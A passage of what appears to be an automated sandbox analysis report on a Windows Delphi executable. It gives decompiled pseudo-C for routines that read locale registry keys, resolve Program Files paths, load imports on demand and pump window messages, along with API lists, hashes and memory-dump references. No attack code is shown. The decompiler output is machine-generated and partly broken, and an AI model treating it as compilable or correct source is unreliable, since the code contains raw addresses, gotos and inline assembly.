                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                                    • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                    • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                                    • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                    • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E006AC23C(void* __ebx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				void* _t54;
				intOrPtr _t65;
				intOrPtr _t73;
				unsigned int _t77;
				void* _t80;
				char _t82;
				char _t84;
				intOrPtr _t89;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t112;
				intOrPtr _t118;
				void* _t129;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t174;
				intOrPtr _t182;
				intOrPtr _t183;

				_t128 = __ebx;
				_t182 = _t183;
				_t129 = 7;
				do {
					_push(0);
					_push(0);
					_t129 = _t129 - 1;
					_t184 = _t129;
				} while (_t129 != 0);
				_push(_t182);
				_push(0x6ac586);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				E005C7430( &_v12);
				E0040A5A8(0x6d6534, _v12);
				E005C745C( &_v16);
				E0040A5A8(0x6d6538, _v16);
				E005C7488( &_v20, __esi, _t182, _t184);
				E0040A5A8(0x6d653c, _v20);
				E005C7530( *0x6d67dd & 0x000000ff, __ebx,  &_v24, __esi);
				E0040A5A8(0x6d6540, _v24);
				_t54 = E00429D18();
				_t185 = _t54 - 2;
				if(_t54 != 2) {
					E0040A1C8(0x6d6544);
				} else {
					E005C6D5C(L"SystemDrive", _t129,  &_v28, _t185);
					E0040A5A8(0x6d6544, _v28);
				}
				if( *0x6d6544 == 0) {
					_t118 =  *0x6d6534; // 0x0
					E005C53A0(_t118,  &_v32);
					E0040A5A8(0x6d6544, _v32);
					_t187 =  *0x6d6544;
					if( *0x6d6544 == 0) {
						E0040A5A8(0x6d6544, 0x6ac5c4);
					}
				}
				E006AC0D0(1, L"ProgramFilesDir", _t187); // executed
				E0040A5A8(0x6d6548, _v36);
				_t188 =  *0x6d6548;
				if( *0x6d6548 == 0) {
					_t174 =  *0x6d6544; // 0x0
					E0040B4C8(0x6d6548, L"\\Program Files", _t174);
				}
				E006AC0D0(1, L"CommonFilesDir", _t188); // executed
				E0040A5A8(0x6d654c, _v40);
				if( *0x6d654c == 0) {
					_t112 =  *0x6d6548; // 0x0
					E005C4EA4(_t112,  &_v44);
					E0040B4C8(0x6d654c, L"Common Files", _v44);
				}
				_t190 =  *0x6d67dd;
				if( *0x6d67dd != 0) {
					E006AC0D0(2, L"ProgramFilesDir", _t190); // executed
					E0040A5A8(0x6d6550, _v48);
					_t191 =  *0x6d6550;
					if( *0x6d6550 == 0) {
						E0060CD28(L"Failed to get path of 64-bit Program Files directory", _t128);
					}
					E006AC0D0(2, L"CommonFilesDir", _t191); // executed
					E0040A5A8(0x6d6554, _v52);
					if( *0x6d6554 == 0) {
						E0060CD28(L"Failed to get path of 64-bit Common Files directory", _t128);
					}
				}
				if( *0x6d68ac == 0) {
					L25:
					__eflags =  *0x6d67dc;
					if( *0x6d67dc == 0) {
						_t65 =  *0x6d6534; // 0x0
						E005C4EA4(_t65,  &_v60);
						E0040B4C8(0x6d6564, L"COMMAND.COM", _v60); // executed
					} else {
						_t73 =  *0x6d6538; // 0x0
						E005C4EA4(_t73,  &_v56);
						E0040B4C8(0x6d6564, L"cmd.exe", _v56);
					}
					E006AC180(); // executed
					__eflags = 0;
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(E006AC58D);
					return E0040A228( &_v60, 0xd);
				} else {
					_t77 =  *0x6d67f0; // 0xa0042ee
					if(_t77 >> 0x10 < 0x600) {
						goto L25;
					} else {
						_t80 =  *0x6d68ac(0x6cd7f4, 0x8000, 0,  &_v8); // executed
						if(_t80 != 0) {
							_t82 =  *0x6d68ac(0x6cd804, 0x8000, 0,  &_v8); // executed
							__eflags = _t82;
							if(_t82 != 0) {
								_t84 =  *0x6d68ac(0x6cd814, 0x8000, 0,  &_v8); // executed
								__eflags = _t84;
								if(_t84 != 0) {
									goto L25;
								} else {
									_push(_t182);
									_push(0x6ac516);
									_push( *[fs:eax]);
									 *[fs:eax] = _t183;
									E0040C8BC();
									__eflags = 0;
									_pop(_t163);
									 *[fs:eax] = _t163;
									_push(E006AC51D);
									_t89 = _v8;
									_push(_t89);
									L0043C214();
									return _t89;
								}
							} else {
								_push(_t182);
								_push(0x6ac4c3);
								_push( *[fs:eax]);
								 *[fs:eax] = _t183;
								E0040C8BC();
								__eflags = 0;
								_pop(_t165);
								 *[fs:eax] = _t165;
								_push(E006AC4CA);
								_t94 = _v8;
								_push(_t94);
								L0043C214();
								return _t94;
							}
						} else {
							_push(_t182);
							_push(0x6ac470);
							_push( *[fs:eax]);
							 *[fs:eax] = _t183;
							E0040C8BC();
							_pop(_t167);
							 *[fs:eax] = _t167;
							_push(E006AC477);
							_t99 = _v8;
							_push(_t99);
							L0043C214();
							return _t99;
						}
					}
				}
			}





































                                                                    0x006ac23c
                                                                    0x006ac23d
                                                                    0x006ac23f
                                                                    0x006ac244
                                                                    0x006ac244
                                                                    0x006ac246
                                                                    0x006ac248
                                                                    0x006ac248
                                                                    0x006ac248
                                                                    0x006ac24d
                                                                    0x006ac24e
                                                                    0x006ac253
                                                                    0x006ac256
                                                                    0x006ac25c
                                                                    0x006ac269
                                                                    0x006ac271
                                                                    0x006ac27e
                                                                    0x006ac286
                                                                    0x006ac293
                                                                    0x006ac2a2
                                                                    0x006ac2af
                                                                    0x006ac2b4
                                                                    0x006ac2b9
                                                                    0x006ac2bc
                                                                    0x006ac2df
                                                                    0x006ac2be
                                                                    0x006ac2c6
                                                                    0x006ac2d3
                                                                    0x006ac2d3
                                                                    0x006ac2eb
                                                                    0x006ac2f0
                                                                    0x006ac2f5
                                                                    0x006ac302
                                                                    0x006ac307
                                                                    0x006ac30e
                                                                    0x006ac31a
                                                                    0x006ac31a
                                                                    0x006ac30e
                                                                    0x006ac329
                                                                    0x006ac336
                                                                    0x006ac33b
                                                                    0x006ac342
                                                                    0x006ac34e
                                                                    0x006ac354
                                                                    0x006ac354
                                                                    0x006ac363
                                                                    0x006ac370
                                                                    0x006ac37c
                                                                    0x006ac381
                                                                    0x006ac386
                                                                    0x006ac398
                                                                    0x006ac398
                                                                    0x006ac39d
                                                                    0x006ac3a4
                                                                    0x006ac3b0
                                                                    0x006ac3bd
                                                                    0x006ac3c2
                                                                    0x006ac3c9
                                                                    0x006ac3d0
                                                                    0x006ac3d0
                                                                    0x006ac3df
                                                                    0x006ac3ec
                                                                    0x006ac3f8
                                                                    0x006ac3ff
                                                                    0x006ac3ff
                                                                    0x006ac3f8
                                                                    0x006ac40b
                                                                    0x006ac51d
                                                                    0x006ac51d
                                                                    0x006ac524
                                                                    0x006ac54a
                                                                    0x006ac54f
                                                                    0x006ac561
                                                                    0x006ac526
                                                                    0x006ac529
                                                                    0x006ac52e
                                                                    0x006ac540
                                                                    0x006ac540
                                                                    0x006ac566
                                                                    0x006ac56b
                                                                    0x006ac56d
                                                                    0x006ac570
                                                                    0x006ac573
                                                                    0x006ac585
                                                                    0x006ac411
                                                                    0x006ac411
                                                                    0x006ac41e
                                                                    0x00000000
                                                                    0x006ac424
                                                                    0x006ac434
                                                                    0x006ac43c
                                                                    0x006ac487
                                                                    0x006ac48d
                                                                    0x006ac48f
                                                                    0x006ac4da
                                                                    0x006ac4e0
                                                                    0x006ac4e2
                                                                    0x00000000
                                                                    0x006ac4e4
                                                                    0x006ac4e6
                                                                    0x006ac4e7
                                                                    0x006ac4ec
                                                                    0x006ac4ef
                                                                    0x006ac4fa
                                                                    0x006ac4ff
                                                                    0x006ac501
                                                                    0x006ac504
                                                                    0x006ac507
                                                                    0x006ac50c
                                                                    0x006ac50f
                                                                    0x006ac510
                                                                    0x006ac515
                                                                    0x006ac515
                                                                    0x006ac491
                                                                    0x006ac493
                                                                    0x006ac494
                                                                    0x006ac499
                                                                    0x006ac49c
                                                                    0x006ac4a7
                                                                    0x006ac4ac
                                                                    0x006ac4ae
                                                                    0x006ac4b1
                                                                    0x006ac4b4
                                                                    0x006ac4b9
                                                                    0x006ac4bc
                                                                    0x006ac4bd
                                                                    0x006ac4c2
                                                                    0x006ac4c2
                                                                    0x006ac43e
                                                                    0x006ac440
                                                                    0x006ac441
                                                                    0x006ac446
                                                                    0x006ac449
                                                                    0x006ac454
                                                                    0x006ac45b
                                                                    0x006ac45e
                                                                    0x006ac461
                                                                    0x006ac466
                                                                    0x006ac469
                                                                    0x006ac46a
                                                                    0x006ac46f
                                                                    0x006ac46f
                                                                    0x006ac43c
                                                                    0x006ac41e

                                                                    APIs
                                                                    • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                                    • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                                    • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                    • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFreeKnownPathTask
                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                    • API String ID: 969438705-544719455
                                                                    • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                    • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                                    • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                    • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E00410BF4(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t133;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x6c5c50, 8 << 2);
				_pop(_t194);
				_v56 =  *0x6c5c50;
				_v52 = E004110A4( *0x006C5C54);
				_v48 = E004110B4( *0x006C5C58);
				_v44 = E004110C4( *0x006C5C5C);
				_v40 = E004110D4( *0x006C5C60);
				_v36 = E004110D4( *0x006C5C64);
				_v32 = E004110D4( *0x006C5C68);
				_v28 =  *0x006C5C6C;
				memcpy( &_v92, 0x6c5c70, 9 << 2);
				_t196 = _t194;
				_v88 = 0x6c5c70;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x6c5c94; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E004110E4( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x6d2644 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x6d2644 != 0) {
							_t191 =  *0x6d2644(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x6d2648 != 0) {
									_t191 =  *0x6d2648(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x6c5c9c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x6d2644 != 0) {
						_t142 =  *0x6d2644(1,  &_v92);
					}
					if(_t142 == 0) {
						_t133 = LoadLibraryA(_v80); // executed
						_t142 = _t133;
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0041057C(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x6c5c4c; // 0x0
									 *_v20 = _t126;
									 *0x6c5c4c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x6d2648 != 0) {
							_t142 =  *0x6d2648(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x6c5c98; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x6d2644(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x6d2644 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x6d2644(5,  &_v92);
						}
						return _t191;
					}
				}
			}








































                                                                    0x00410c08
                                                                    0x00410c0e
                                                                    0x00410c10
                                                                    0x00410c13
                                                                    0x00410c20
                                                                    0x00410c2d
                                                                    0x00410c3a
                                                                    0x00410c47
                                                                    0x00410c54
                                                                    0x00410c61
                                                                    0x00410c6a
                                                                    0x00410c78
                                                                    0x00410c7a
                                                                    0x00410c7b
                                                                    0x00410c81
                                                                    0x00410c87
                                                                    0x00410c8e
                                                                    0x00410c90
                                                                    0x00410c96
                                                                    0x00410c9c
                                                                    0x00410cac
                                                                    0x00000000
                                                                    0x00410cb1
                                                                    0x00410cbe
                                                                    0x00410cc3
                                                                    0x00410cc5
                                                                    0x00410cc7
                                                                    0x00410cc7
                                                                    0x00410ccd
                                                                    0x00410cd0
                                                                    0x00410cd8
                                                                    0x00410ce2
                                                                    0x00410ce5
                                                                    0x00410cea
                                                                    0x00410d05
                                                                    0x00410cec
                                                                    0x00410cf8
                                                                    0x00410cf8
                                                                    0x00410d08
                                                                    0x00410d11
                                                                    0x00410d2a
                                                                    0x00410d2c
                                                                    0x00410dee
                                                                    0x00410dee
                                                                    0x00410df8
                                                                    0x00410e06
                                                                    0x00410e06
                                                                    0x00410e0a
                                                                    0x00410e57
                                                                    0x00410e59
                                                                    0x00410e60
                                                                    0x00410e6a
                                                                    0x00410e78
                                                                    0x00410e78
                                                                    0x00410e7c
                                                                    0x00410e7e
                                                                    0x00410e83
                                                                    0x00410e89
                                                                    0x00410e99
                                                                    0x00410e9e
                                                                    0x00410e9e
                                                                    0x00410e7c
                                                                    0x00000000
                                                                    0x00410e0c
                                                                    0x00410e10
                                                                    0x00410e4b
                                                                    0x00410e55
                                                                    0x00000000
                                                                    0x00410e18
                                                                    0x00410e1b
                                                                    0x00410e23
                                                                    0x00000000
                                                                    0x00410e3c
                                                                    0x00410e42
                                                                    0x00410e47
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00410ea1
                                                                    0x00410ea4
                                                                    0x00000000
                                                                    0x00410ea4
                                                                    0x00410e23
                                                                    0x00410e10
                                                                    0x00410e0a
                                                                    0x00410d39
                                                                    0x00410d47
                                                                    0x00410d47
                                                                    0x00410d4b
                                                                    0x00410d51
                                                                    0x00410d56
                                                                    0x00410d56
                                                                    0x00410d5a
                                                                    0x00410da7
                                                                    0x00410db3
                                                                    0x00410de9
                                                                    0x00410db5
                                                                    0x00410db9
                                                                    0x00410dbf
                                                                    0x00410dc4
                                                                    0x00410dc9
                                                                    0x00410dd0
                                                                    0x00410dd6
                                                                    0x00410ddb
                                                                    0x00410de0
                                                                    0x00410de0
                                                                    0x00410dc9
                                                                    0x00410db9
                                                                    0x00000000
                                                                    0x00410d5c
                                                                    0x00410d61
                                                                    0x00410d6b
                                                                    0x00410d79
                                                                    0x00410d79
                                                                    0x00410d7d
                                                                    0x00000000
                                                                    0x00410d7f
                                                                    0x00410d7f
                                                                    0x00410d84
                                                                    0x00410d8a
                                                                    0x00410d9a
                                                                    0x00000000
                                                                    0x00410d9f
                                                                    0x00410d7d
                                                                    0x00410d13
                                                                    0x00410d1f
                                                                    0x00410d23
                                                                    0x00000000
                                                                    0x00410d25
                                                                    0x00410ea6
                                                                    0x00410ead
                                                                    0x00410eb1
                                                                    0x00410eb4
                                                                    0x00410eb7
                                                                    0x00410ec0
                                                                    0x00410ec0
                                                                    0x00000000
                                                                    0x00410ec6
                                                                    0x00410d23

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: P\l$p\l
                                                                    • API String ID: 3997070919-2963016475
                                                                    • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                    • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                                    • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                    • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E005B85F0(void* __eax, void* __ecx, struct tagMSG* __edx) {
				char _v19;
				int _t10;
				char _t12;
				int _t13;
				void* _t14;
				int _t30;
				int _t32;
				MSG* _t43;
				void* _t44;
				char* _t46;

				_t43 = __edx;
				_t44 = __eax;
				_t32 = 0;
				_t10 = PeekMessageW(__edx, 0, 0, 0, 0); // executed
				if(_t10 != 0) {
					_v19 = _t12;
					if(_v19 == 0) {
						_t13 = PeekMessageA(_t43, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t13 + 1;
					} else {
						_t30 = PeekMessageW(_t43, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t30 + 1;
					}
					if(_t14 != 0) {
						_t32 = 1;
						if(_t43->message == 0x12) {
							 *((char*)(_t44 + 0xbc)) = 1;
						} else {
							 *_t46 = 0;
							if( *((short*)(_t44 + 0x122)) != 0) {
								 *((intOrPtr*)(_t44 + 0x120))();
							}
							if(E005BA368(_t44, _t43) == 0 && E005B8488(_t44, _t43) == 0 &&  *_t46 == 0 && E005B8340(_t44, _t43) == 0 && E005B8390(_t44, _t43) == 0 && E005B82F8(_t44, _t43) == 0) {
								TranslateMessage(_t43);
								if(_v19 == 0) {
									DispatchMessageA(_t43);
								} else {
									DispatchMessageW(_t43); // executed
								}
							}
						}
					}
				}
				return _t32;
			}













                                                                    0x005b85f5
                                                                    0x005b85f7
                                                                    0x005b85f9
                                                                    0x005b8604
                                                                    0x005b860b
                                                                    0x005b8627
                                                                    0x005b8630
                                                                    0x005b8651
                                                                    0x005b8659
                                                                    0x005b865b
                                                                    0x005b8632
                                                                    0x005b863b
                                                                    0x005b8643
                                                                    0x005b8645
                                                                    0x005b8645
                                                                    0x005b865e
                                                                    0x005b8664
                                                                    0x005b866a
                                                                    0x005b86f2
                                                                    0x005b8670
                                                                    0x005b8670
                                                                    0x005b867c
                                                                    0x005b8688
                                                                    0x005b8688
                                                                    0x005b8699
                                                                    0x005b86d6
                                                                    0x005b86e0
                                                                    0x005b86eb
                                                                    0x005b86e2
                                                                    0x005b86e3
                                                                    0x005b86e3
                                                                    0x005b86e0
                                                                    0x005b8699
                                                                    0x005b866a
                                                                    0x005b865e
                                                                    0x005b8700

                                                                    APIs
                                                                    • PeekMessageW.USER32 ref: 005B8604
                                                                    • IsWindowUnicode.USER32 ref: 005B8618
                                                                    • PeekMessageW.USER32 ref: 005B863B
                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                                    • TranslateMessage.USER32 ref: 005B86D6
                                                                    • DispatchMessageW.USER32 ref: 005B86E3
                                                                    • DispatchMessageA.USER32 ref: 005B86EB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                    • String ID:
                                                                    • API String ID: 2190272339-0
                                                                    • Opcode ID: 2f195b20c59e7edbc16b7d2fd048cba63cfdff170111f45a03f5aac70044babc
                                                                    • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                                    • Opcode Fuzzy Hash: 2f195b20c59e7edbc16b7d2fd048cba63cfdff170111f45a03f5aac70044babc
                                                                    • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E006AC8CC(long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char* _t40;
				intOrPtr _t41;
				int _t47;
				intOrPtr _t77;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t94;
				intOrPtr _t107;
				intOrPtr _t108;

				_t105 = __esi;
				_t104 = __edi;
				_t79 = __ebx;
				_t107 = _t108;
				_t80 = 6;
				do {
					_push(0);
					_push(0);
					_t80 = _t80 - 1;
				} while (_t80 != 0);
